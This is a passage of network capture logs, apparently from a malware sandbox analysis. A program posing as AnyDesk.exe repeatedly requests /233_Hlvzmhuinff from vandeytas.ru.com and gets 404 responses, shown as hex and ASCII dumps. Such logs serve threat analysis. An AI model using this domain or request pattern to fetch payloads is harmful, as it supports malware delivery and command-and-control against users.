65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49742	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:25 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:25 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:25 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:25 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49749	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:27 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:27 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:27 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:27 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49756	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:29 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:29 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:29 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:29 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49763	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:31 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:32 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:31 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:32 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49770	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:33 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:34 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:33 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:34 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49778	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:35 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:36 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:36 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:36 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49785	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:38 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:38 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:38 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:38 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49792	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:40 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:40 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:40 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:40 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49799	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:42 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:42 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:42 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:42 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49806	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:44 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:45 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:44 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:45 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49812	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:46 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:47 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:47 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49819	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:48 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:49 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:49 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:49 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49826	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:51 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:51 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:51 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:51 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49833	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:53 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:53 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:53 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
